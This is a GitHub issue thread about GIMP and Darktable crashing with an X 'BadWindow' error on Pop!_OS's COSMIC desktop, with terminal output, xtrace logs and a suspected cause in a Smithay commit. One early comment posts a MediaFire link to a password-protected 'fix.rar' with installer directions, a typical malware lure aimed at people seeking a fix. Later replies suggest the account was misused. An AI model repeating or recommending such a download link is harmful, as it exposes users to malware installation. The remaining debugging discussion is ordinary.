### ISSUE TITLE
GIMP quits with 'BadWindow' Error When Creating a New Image

### ISSUE THREAD

**Issue by farhatizakaria** [pop-os/cosmic-epoch#835]
GIMP crashes when attempting to create a new image. The application quits silently when launched in GUI mode. However, when GIMP is run from the terminal, it displays an error message related to the X Window System after creating a new image:

```
The program 'gimp' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadWindow (invalid Window parameter)'.
  (Details: serial 14880 error_code 3 request_code 4 minor_code 0)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)

(script-fu:6077): LibGimpBase-WARNING **: 13:51:03.708: script-fu: gimp_wire_read(): error
```

**Steps to Reproduce:**

1. Open a terminal on Pop!_OS 24.04 with COSMIC Desktop.
2. Launch GIMP from the terminal using the command: gimp.
3. In GIMP, navigate to File > New to create a new image.
4. Observe that GIMP crashes with the error message in the terminal.

**Expected Result:** GIMP should successfully create a new image without crashing, and without displaying error messages.

**Actual Result:** GIMP crashes when creating a new image. The application exits silently in GUI mode but shows the error message above when run from the terminal

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Thank you for deleting that. I'm working on solving the issue now

**Comment by leviport** [comment]
How did that happen?

**Comment by HarbingerOfFire** [comment]
I got a little too curious with the source...

**Comment by leviport** [comment]
Gotcha. Glad it's resolved.

**Comment by robrotheram** [comment]
Also seen it with Darktable flatpack 

Would load and after a few minuets would silently crash with a same error as with GIMP.

```
The program 'darktable' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadWindow (invalid Window parameter)'.
  (Details: serial 89762 error_code 3 request_code 4 (core protocol) minor_code 0)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the GDK_SYNCHRONIZE environment
   variable to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
   ```

**Comment by AlwynBarry** [comment]
GIMP also crashes when using the 'colour picker' for a second time when the colour chooser window is already open.  Because GIMP only opens with an image when opened from the GUI (see error above) its impossible to capture error messages to identify why this problem occurs (sorry!) and so I can't flag what the core issue may be.

**Comment by ids1024** [comment]
At least this is pretty reproducible. Though I'm sure Gimp didn't used to have this issue in cosmic-comp...

Looking at `xtrace -n gimp`:

```
000:<:30f2:  8: Request(4): DestroyWindow window=0x00400632
000:<:30f3: 16: Request(2): ChangeWindowAttributes window=0x0040014a value-list={cursor=None(0x00000000)}
000:<:30f4:  8: Request(38): QueryPointer window=0x0040014a
000:>:30f4: Event MIT-SHM-Completion(65) drawable=0x00400977 shmseg=0x004005da offset=0x00700000
000:>:30f2:Error 3=Window: major=4, minor=0, bad=0x00400632, seq=30f2
000:>:30f4:32: Reply to QueryPointer: same-screen=true(0x01) root=0x00000500 child=None(0x00000000) root-x=851 root-y=443 win-x=129 win-y=359 mask=0
```

And earlier in the log:

```
13206:000:<:2bfa:  8: Request(10): UnmapWindow window=0x00400632
13207:000:<:2bfb: 44: Request(25): SendEvent propagate=false(0x00) destination=0x00000500 event-mask=SubstructureNotify,SubstructureRedirect UnmapNotify(18) event=0x00000500 window=0x00400632 from-configure=false(0x00)
13208:000:<:2bfc: 16: Request(40): TranslateCoordinates src-window=0x00400632 dst-window=0x00000500 src-x=0 src-y=0
13209:000:>:2bfc: Event UnmapNotify(18) event=0x00400632 window=0x00400632 from-configure=false(0x00)
13211:000:>:2bfc: Event FocusOut(10) detail=Virtual(0x01) event=0x00400632 mode=Normal(0x00)
13212:000:>:2bfc: Event LeaveNotify(8) detail=Ancestor(0x00) mode=Normal(0x00) flags=focus,same-screen time=0x0042b13c root=0x00000500 event=0x00400632 child=None(0x00000000) root-x=851 root-y=443 event-x=329 event-y=249 state=0
13215:000:>:2bfc: Event DestroyNotify(17) event=0x00400632 window=0x00400632
```

So maybe our X window manager is destroying the window after the client unmaps it, but should leave it to the client to do that? Not sure exactly how these requests work in X.

**Comment by ids1024** [comment]
Looks like this started with https://github.com/Smithay/smithay/commit/c6aab182a3. (Though reverting that is probably not the correct fix.)

**Comment by AlwynBarry** [comment]
I tried again today - similar results.  But noticed it was an x-windows error!  So I went into Flatseal and reset the flags on GIMP.  I had set it to run under Wayland, since that works well in Gnome.  But when I reset the flags to only run under X-windows, it all works under Cosmic!  Not sure how this helps, apart from to give a hint that maybe its Cosmic not realising its running under X and trying to display the dialogs via Wayland (or visa versa).  No evidence for this apart from the Flatseal flag resets.
